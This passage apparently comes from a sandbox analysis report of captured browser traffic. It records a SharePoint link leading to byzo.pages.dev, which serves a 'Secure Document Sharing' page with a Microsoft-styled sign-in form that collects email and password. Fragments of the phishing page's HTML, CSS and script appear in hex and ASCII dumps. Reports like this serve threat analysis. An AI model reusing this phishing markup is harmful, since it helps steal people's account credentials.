                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://insacentre-my.sharepoint.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://insacentre-my.sharepoint.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:47 UTC606INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Length: 2283
                                                Content-Type: application/json; charset=utf-8
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: b2edd820-b1b5-4700-84af-31570fddefe9
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006A1
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://insacentre-my.sharepoint.com
                                                X-Content-Type-Options: nosniff
                                                X-OFFICEFD: AM1PEPF000006A1
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 12F053B220304ABDB604DAF04C4F3C6F Ref B: AMS231032601049 Ref C: 2022-10-03T13:38:47Z
                                                Date: Mon, 03 Oct 2022 13:38:46 GMT
                                                Connection: close
                                                2022-10-03 13:38:47 UTC607INData Raw: 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 36 36 34 38 30 34 33 32 37 33 39 39 2c 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 6c 73 48 65 61 72 74 42 65 61 74 49 73 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 42 6f 6f 74 73 74 72 61 70 70 65 72 53 65 74 74 69 6e 67 73 46 65 74 63 68 50 65 72 69 6f 64 22 3a 36 30 30 30 30 2c 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 6c 73 48 65 61 72 74 62 65 61 74 49 6e 74 65 72 76 61 6c 4d 73 22 3a 35 30 30 30 2c 22 42 6f 6f 74 73 74 72 61 70 70 65 72 4d 61 78 55 6c 73 48 65 61 72 74 62 65 61 74 54 69 6d 65 22 3a 36 30 30 30 30 30 2c 22 42 6f 6f 74 73 74 72 61 70 70 65 72 4e 6f 43 6f 6d 70 6c 65 74 65 57 61 72 6e 69 6e 67 31 54 69 6d 65 22 3a 31 32 30 30 30 30 2c 22 42 6f 6f 74 73 74 72 61 70 70 65 72 4e 6f 43 6f 6d 70
                                                Data Ascii: {"timestamp":1664804327399,"BootstrapperUlsHeartBeatIsEnabled":false,"BootstrapperSettingsFetchPeriod":60000,"BootstrapperUlsHeartbeatIntervalMs":5000,"BootstrapperMaxUlsHeartbeatTime":600000,"BootstrapperNoCompleteWarning1Time":120000,"BootstrapperNoComp
                                                2022-10-03 13:38:47 UTC609INData Raw: 2c 31 39 38 36 37 34 39 35 34 36 2c 32 30 30 34 34 34 33 37 36 30 2c 32 30 30 34 34 34 34 32 37 38 2c 32 30 30 34 34 34 38 33 35 34 22 7d
                                                Data Ascii: ,1986749546,2004443760,2004444278,2004448354"}


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                34192.168.2.34988713.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:47 UTC609OUTPOST /o/RemoteUls.ashx?usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&officeserverversion=16.0.15707.41015 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 1561
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Content-Type: text/plain;charset=UTF-8
                                                Accept: */*
                                                Origin: https://insacentre-my.sharepoint.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://insacentre-my.sharepoint.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:47 UTC610OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 37 30 32 30 32 37 2c 22 4c 22 3a 5b 7b 22 47 22 3a 35 39 35 37 31 34 37 31 35 2c 22 54 22 3a 34 37 2c 22 4d 22 3a 22 52 65 63 65 69 76 65 64 20 6d 65 73 73 61 67 65 49 64 3a 20 41 70 70 5f 53 77 69 74 63 68 54 6f 57 61 63 46 72 61 6d 65 2c 20 63 6f 72 72 65 6c 61 74 69 6f 6e 3a 20 36 61 64 66 37 62 61 32 2d 65 62 30 64 2d 34 62 30 63 2d 38 66 37 65 2d 64 33 37 35 63 36 61 39 32 34 62 32 22 2c 22 43 22 3a 33 37 39 2c 22 44 22 3a 35 30 7d 2c 7b 22 47 22 3a 35 39 36 34 36 34 32 38 39 2c 22 54 22 3a 34 37 2c 22 4d 22 3a 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f 75 6e 64 20 66 6f 72 20 6d 65 73 73 61 67 65 20 69 64 3a 20 41 70 70 5f 53 77 69 74 63 68 54 6f 57 61 63 46 72 61 6d 65 22 2c 22 43 22 3a 33 37 39 2c 22 44 22 3a 35
                                                Data Ascii: {"T":1664836702027,"L":[{"G":595714715,"T":47,"M":"Received messageId: App_SwitchToWacFrame, correlation: 6adf7ba2-eb0d-4b0c-8f7e-d375c6a924b2","C":379,"D":50},{"G":596464289,"T":47,"M":"No handler found for message id: App_SwitchToWacFrame","C":379,"D":5
                                                2022-10-03 13:38:47 UTC612INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 39b3fa78-d1ce-4f97-ac38-51fd197eb37b
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM4PEPF0000B715
                                                X-OfficeVersion: 16.0.15726.41002
                                                X-OfficeCluster: GEU8
                                                Access-Control-Allow-Origin: https://insacentre-my.sharepoint.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-bULS-SuppressedTags: 378069,1671813,2209344,3249545,3290144,4298965,4298968,4298969,4751696,5306497,5904476,6375195,6572226,6948167,7463498,17085210,17085216,17162522,17358857,19743902,19939648,20486158,21627712,21631370,22401293,22410500,22558617,22598977,22680210,22680213,22680214,22836558,22946650,23909858,24401375,24462656,24515087,25514973,33592839,34388130,35682372,36472266,36546380,36546381,36546382,36569418,36708451,36773964,36791688,36811158,36811159,36963655,37288035,37876293,37876294,37889309,38293640,38535900,38543496,38580697,38637954,38922202,39076766,39076767,39105358,39408129,39613840,39966341,40437001,40777251,40935455,40957978,40957979,41003225,41207258,41502555,41711299,41952657,41964821,41964885,42272991,42496725,42513088,42815875,42857251,50406866,50431969,50619726,50622685,50622687,51451613,51492170,51504083,51667010,306230939,306978834,520979847,521007315,521749855,524150164,524883107,524883136,524883138,537159499,537169937,538542792,538543587,539075678,539874723,540378699,540378700,542700237,542994947,545783884,557077970,557322386,557389507,557670930,558735363,559423838,559424262,559486496,559760215,559760216,570507662,571549507,571786073,571786074,574468116,575157663,575157664,575157665,575157666,575157667,575157696,575157697,575157698,575157699,575157700,575157701,575157702,577295376,577626581,577831138,578164000,587862985,589101015,589101018,591684683,591729363,592259104,592556551,592843145,593780815,593838232,593862981,594134597,594396706,594830612,595137156,595714715,595895774,596115913,596444186,596464289,845836083,845836084,845836085,846166132,876178018,963472182,1630679666,1630679667,1633958006,1647605351,1664576567,1698260075,1718235956,1765045358,1802139698,1986689397,1986689633,1986689647,1986748791,1986748793,1986749030,1986749288,1986749546,2004443760,2004444278,2004448354
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM4PEPF0000B715
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 563694A486DE4941955B2665907DBD1A Ref B: AMS231032606017 Ref C: 2022-10-03T13:38:47Z
                                                Date: Mon, 03 Oct 2022 13:38:47 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                35192.168.2.349888188.114.97.3443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:47 UTC615OUTGET / HTTP/1.1
                                                Host: byzo.pages.dev
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:47 UTC615INHTTP/1.1 200 OK
                                                Date: Mon, 03 Oct 2022 13:38:47 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 13377
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=0, must-revalidate
                                                ETag: "fc1b4709847018b6802b45525a754399"
                                                referrer-policy: strict-origin-when-cross-origin
                                                x-content-type-options: nosniff
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RV%2FjtadxGpKV2HOW2XEnybkRi85ccw3LGT1Lykes3JumrB3B1MmNlNzoVu%2FGB6iwfPR%2FwYMtUKjDaxkWUDwbBVd7Cpm37OBk2UxUo2dXzM2FD549No0px5peeH9GTBku6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 75461487ba769243-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                2022-10-03 13:38:47 UTC616INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 65 63 75 72 65 20 44 6f 63 75 6d 65 6e 74 20 53 68 61 72 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 09 09 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 2d 2d 63 6f 6c 6f 72
                                                Data Ascii: <!DOCTYPE html><head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta charset="utf-8"> <title>Secure Document Sharing</title><style>body {margin: 0;padding: 0;font-family: 'Segoe', sans-serif;--color
                                                2022-10-03 13:38:47 UTC617INData Raw: 63 6f 76 65 72 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0a 0a 7d 0a 2e 66 6f 72 6d 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 33 35 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 33 32 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 34 70 78 20 34 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 35 70 78 20 32 35 70 78 20 72 67 62 28 30 20 30 20 30 20
                                                Data Ascii: cover;background-size: cover;}.form { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 350px; height: 320px; padding: 44px 44px; background: #fff; box-shadow: 0 15px 25px rgb(0 0 0
                                                2022-10-03 13:38:47 UTC618INData Raw: 2d 2d 65 72 72 6f 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 65 72 72 6f 72 29 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 65 72 72 6f 72 29 3b 0a 7d 0a 0a 2e 66 6f 72 6d 5f 5f 69 6e 70 75 74 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 2e 35 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 35 72 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 65 72 72 6f 72 29 3b 0a 7d 0a 0a 2e 66 6f 72 6d 5f 5f 62 75 74 74 6f 6e 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 38 72 65 6d 20 32 72 65 6d 3b 0a 20 20 20
                                                Data Ascii: --error { color: var(--color-error); border-color: var(--color-error);}.form__input-error-message { margin-top: 0.5rem; font-size: 0.85rem; color: var(--color-error);}.form__button { width: 100%; padding: 0.8rem 2rem;
                                                2022-10-03 13:38:47 UTC619INData Raw: 76 5a 47 6c 77 62 32 52 70 4c 54 41 75 5a 48 52 6b 49 67 6f 67 49 43 42 34 62 57 78 75 63 7a 70 70 62 6d 74 7a 59 32 46 77 5a 54 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 70 62 6d 74 7a 59 32 46 77 5a 53 35 76 63 6d 63 76 62 6d 46 74 5a 58 4e 77 59 57 4e 6c 63 79 39 70 62 6d 74 7a 59 32 46 77 5a 53 49 4b 49 43 41 67 64 32 6c 6b 64 47 67 39 49 6a 45 77 4f 43 49 4b 49 43 41 67 61 47 56 70 5a 32 68 30 50 53 49 79 4e 43 49 4b 49 43 41 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 45 77 4f 43 41 79 4e 43 49 4b 49 43 41 67 64 6d 56 79 63 32 6c 76 62 6a 30 69 4d 53 34 78 49 67 6f 67 49 43 42 70 5a 44 30 69 63 33 5a 6e 4d 54 51 69 43 69 41 67 49 48 4e 76 5a 47 6c 77 62 32 52 70 4f 6d 52 76 59 32 35 68 62 57 55 39 49 6d 31 7a 5a 6e 51 75 63 33
                                                Data Ascii: vZGlwb2RpLTAuZHRkIgogICB4bWxuczppbmtzY2FwZT0iaHR0cDovL3d3dy5pbmtzY2FwZS5vcmcvbmFtZXNwYWNlcy9pbmtzY2FwZSIKICAgd2lkdGg9IjEwOCIKICAgaGVpZ2h0PSIyNCIKICAgdmlld0JveD0iMCAwIDEwOCAyNCIKICAgdmVyc2lvbj0iMS4xIgogICBpZD0ic3ZnMTQiCiAgIHNvZGlwb2RpOmRvY25hbWU9Im1zZnQuc3
                                                2022-10-03 13:38:47 UTC621INData Raw: 61 57 35 6b 62 33 63 74 62 57 46 34 61 57 31 70 65 6d 56 6b 50 53 49 77 49 67 6f 67 49 43 41 67 49 47 6c 75 61 33 4e 6a 59 58 42 6c 4f 6d 4e 31 63 6e 4a 6c 62 6e 51 74 62 47 46 35 5a 58 49 39 49 6e 4e 32 5a 7a 45 30 49 69 41 76 50 67 6f 67 49 44 78 30 61 58 52 73 5a 51 6f 67 49 43 41 67 49 47 6c 6b 50 53 4a 30 61 58 52 73 5a 54 49 69 50 6d 46 7a 63 32 56 30 63 7a 77 76 64 47 6c 30 62 47 55 2b 43 69 41 67 50 48 42 68 64 47 67 4b 49 43 41 67 49 43 42 6b 50 53 4a 4e 4e 44 51 75 4f 44 4d 32 4c 44 51 75 4e 6c 59 78 4f 43 34 30 61 43 30 79 4c 6a 52 57 4e 79 34 31 4f 44 4e 49 4e 44 49 75 4e 45 77 7a 4f 43 34 78 4d 54 6b 73 4d 54 67 75 4e 45 67 7a 4e 69 34 31 4d 7a 46 4d 4d 7a 49 75 4d 54 51 79 4c 44 63 75 4e 54 67 7a 61 43 30 75 4d 44 49 35 56 6a 45 34 4c 6a 52
                                                Data Ascii: aW5kb3ctbWF4aW1pemVkPSIwIgogICAgIGlua3NjYXBlOmN1cnJlbnQtbGF5ZXI9InN2ZzE0IiAvPgogIDx0aXRsZQogICAgIGlkPSJ0aXRsZTIiPmFzc2V0czwvdGl0bGU+CiAgPHBhdGgKICAgICBkPSJNNDQuODM2LDQuNlYxOC40aC0yLjRWNy41ODNINDIuNEwzOC4xMTksMTguNEgzNi41MzFMMzIuMTQyLDcuNTgzaC0uMDI5VjE4LjR
                                                2022-10-03 13:38:47 UTC622INData Raw: 43 30 75 4f 44 55 79 4c 53 34 78 4d 69 77 78 4c 6a 67 77 4f 43 77 78 4c 6a 67 77 4f 43 77 77 4c 44 41 73 4d 43 30 78 4c 6a 51 30 4f 43 34 33 4d 6a 49 73 4d 79 34 30 4e 6a 63 73 4d 79 34 30 4e 6a 63 73 4d 43 77 77 4c 44 41 74 4c 6a 55 35 4d 69 77 79 4c 6a 49 79 4d 31 59 78 4f 43 34 30 53 44 59 77 4c 6a 55 79 4e 56 59 34 4c 6a 55 77 4e 32 67 79 4c 6a 4d 79 4f 58 59 78 4c 6a 55 31 4f 57 67 75 4d 44 4d 34 51 54 49 75 4e 7a 49 35 4c 44 49 75 4e 7a 49 35 4c 44 41 73 4d 43 77 78 4c 44 59 7a 4c 6a 67 31 4e 53 77 34 4c 6a 67 73 4d 69 34 32 4d 54 45 73 4d 69 34 32 4d 54 45 73 4d 43 77 77 4c 44 45 73 4e 6a 55 75 4e 43 77 34 4c 6a 4d 30 4d 32 30 78 4c 44 55 75 4d 6a 55 30 51 54 55 75 4d 7a 55 34 4c 44 55 75 4d 7a 55 34 4c 44 41 73 4d 43 77 78 4c 44 59 33 4c 6a 63 35
                                                Data Ascii: C0uODUyLS4xMiwxLjgwOCwxLjgwOCwwLDAsMC0xLjQ0OC43MjIsMy40NjcsMy40NjcsMCwwLDAtLjU5MiwyLjIyM1YxOC40SDYwLjUyNVY4LjUwN2gyLjMyOXYxLjU1OWguMDM4QTIuNzI5LDIuNzI5LDAsMCwxLDYzLjg1NSw4LjgsMi42MTEsMi42MTEsMCwwLDEsNjUuNCw4LjM0M20xLDUuMjU0QTUuMzU4LDUuMzU4LDAsMCwxLDY3Ljc5
                                                2022-10-03 13:38:47 UTC623INData Raw: 55 32 4e 43 77 77 4c 44 41 73 4d 53 30 78 4c 6a 67 79 4f 53 30 78 4c 6a 49 78 4d 79 77 79 4c 6a 59 31 4e 53 77 79 4c 6a 59 31 4e 53 77 77 4c 44 41 73 4d 53 30 75 4e 54 4d 35 4c 54 45 75 4e 7a 45 7a 4c 44 49 75 4e 7a 41 32 4c 44 49 75 4e 7a 41 32 4c 44 41 73 4d 43 77 78 4c 44 45 75 4d 44 59 7a 4c 54 49 75 4d 6b 45 30 4c 6a 49 30 4d 79 77 30 4c 6a 49 30 4d 79 77 77 4c 44 41 73 4d 53 77 34 4d 53 34 31 4c 44 67 75 4d 6a 55 32 59 54 59 75 4e 6a 59 7a 4c 44 59 75 4e 6a 59 7a 4c 44 41 73 4d 43 77 78 4c 44 45 75 4d 54 59 30 4c 6a 45 78 4e 53 77 31 4c 6a 45 32 4d 53 77 31 4c 6a 45 32 4d 53 77 77 4c 44 41 73 4d 53 77 78 4c 6a 41 33 4f 43 34 7a 64 6a 49 75 4d 6a 45 30 59 54 51 75 4f 54 63 30 4c 44 51 75 4f 54 63 30 4c 44 41 73 4d 43 77 77 4c 54 45 75 4d 44 63 34 4c
                                                Data Ascii: U2NCwwLDAsMS0xLjgyOS0xLjIxMywyLjY1NSwyLjY1NSwwLDAsMS0uNTM5LTEuNzEzLDIuNzA2LDIuNzA2LDAsMCwxLDEuMDYzLTIuMkE0LjI0Myw0LjI0MywwLDAsMSw4MS41LDguMjU2YTYuNjYzLDYuNjYzLDAsMCwxLDEuMTY0LjExNSw1LjE2MSw1LjE2MSwwLDAsMSwxLjA3OC4zdjIuMjE0YTQuOTc0LDQuOTc0LDAsMCwwLTEuMDc4L
                                                2022-10-03 13:38:47 UTC625INData Raw: 33 4c 6a 4d 78 4d 31 59 34 4c 6a 55 77 4e 32 67 7a 4c 6a 51 32 4f 56 59 32 4c 6a 49 34 4d 32 77 79 4c 6a 4d 7a 4f 53 30 75 4e 7a 45 79 56 6a 67 75 4e 54 41 33 61 44 49 75 4d 7a 55 34 64 6a 45 75 4f 54 41 32 61 43 30 79 4c 6a 4d 31 4f 48 59 30 4c 6a 59 79 4f 57 45 78 4c 6a 6b 31 4d 53 77 78 4c 6a 6b 31 4d 53 77 77 4c 44 41 73 4d 43 77 75 4d 7a 4d 79 4c 44 45 75 4d 6a 6b 73 4d 53 34 7a 4d 6a 59 73 4d 53 34 7a 4d 6a 59 73 4d 43 77 77 4c 44 41 73 4d 53 34 77 4e 44 51 75 4d 7a 63 31 4c 44 45 75 4e 54 55 33 4c 44 45 75 4e 54 55 33 4c 44 41 73 4d 43 77 77 4c 43 34 30 4f 44 59 74 4c 6a 45 73 4d 69 34 79 4f 54 51 73 4d 69 34 79 4f 54 51 73 4d 43 77 77 4c 44 41 73 4c 6a 55 74 4c 6a 49 7a 4d 56 59 78 4f 43 34 7a 59 54 49 75 4e 7a 4d 33 4c 44 49 75 4e 7a 4d 33 4c 44
                                                Data Ascii: 3LjMxM1Y4LjUwN2gzLjQ2OVY2LjI4M2wyLjMzOS0uNzEyVjguNTA3aDIuMzU4djEuOTA2aC0yLjM1OHY0LjYyOWExLjk1MSwxLjk1MSwwLDAsMCwuMzMyLDEuMjksMS4zMjYsMS4zMjYsMCwwLDAsMS4wNDQuMzc1LDEuNTU3LDEuNTU3LDAsMCwwLC40ODYtLjEsMi4yOTQsMi4yOTQsMCwwLDAsLjUtLjIzMVYxOC4zYTIuNzM3LDIuNzM3LD
                                                2022-10-03 13:38:47 UTC626INData Raw: 73 61 67 65 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 6c 65 61 73 65 20 73 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 70 72 6f 63 65 73 73 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 5f 5f 69 6e 70 75 74 2d 67 72 6f 75 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 65 6d 61 69 6c 20 63 6c 61 73 73 3d 22 66 6f 72 6d 5f 5f 69 6e 70 75 74 22 20 61 75 74 6f 66 6f 63 75 73 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 22 20 69 64 3d 22 65 6d 61 69
                                                Data Ascii: sages"> <p>Please sign in to your account to complete process.</p> </div> <div class="form__input-group"> <input type=email class="form__input" autofocus placeholder="Email" id="emai
                                                2022-10-03 13:38:47 UTC627INData Raw: 20 72 65 71 75 65 73 74 2e 6f 6e 6c 6f 61 64 20 3d 20 28 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 20 3d 20 6e 75 6c 6c 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 72 65 71 75 65 73 74 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 4a 53 4f 4e 21 27 29 3b 0a 20 20
                                                Data Ascii: request.onload = () => { let responseObject = null; try { responseObject = JSON.parse(request.responseText); } catch (e) { console.error('Could not parse JSON!');
                                                2022-10-03 13:38:47 UTC629INData Raw: 64 69 73 70 6c 61 79 20 3d 20 22 62 6c 6f 63 6b 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 2e 6d 65 73 73 61 67 65 73 20 21 3d 20 22 50 61 73 73 77 6f 72 64 20 63 61 6e 6e 6f 74 20 62 65 20 65 6d 70 74 79 21 22 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 2e 6d 65 73 73 61 67 65 73 20 21 3d 20 22 45 6d 61 69 6c 20 63 61 6e 6e 6f 74 20 62 65 20 65 6d 70 74 79 21 22 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 2e 6d 65 73 73 61 67 65 73 20 21 3d 20 22 54 68 69 73 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 65 6d 61 69 6c 22 29 7b 0a 20 20 20 20 20 20 20
                                                Data Ascii: display = "block"; } if(responseObject.messages != "Password cannot be empty!"){ if (responseObject.messages != "Email cannot be empty!"){ if (responseObject.messages != "This is not a valid email"){


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                36192.168.2.349889188.114.97.3443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:47 UTC629OUTGET /favicon.ico HTTP/1.1
                                                Host: byzo.pages.dev
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
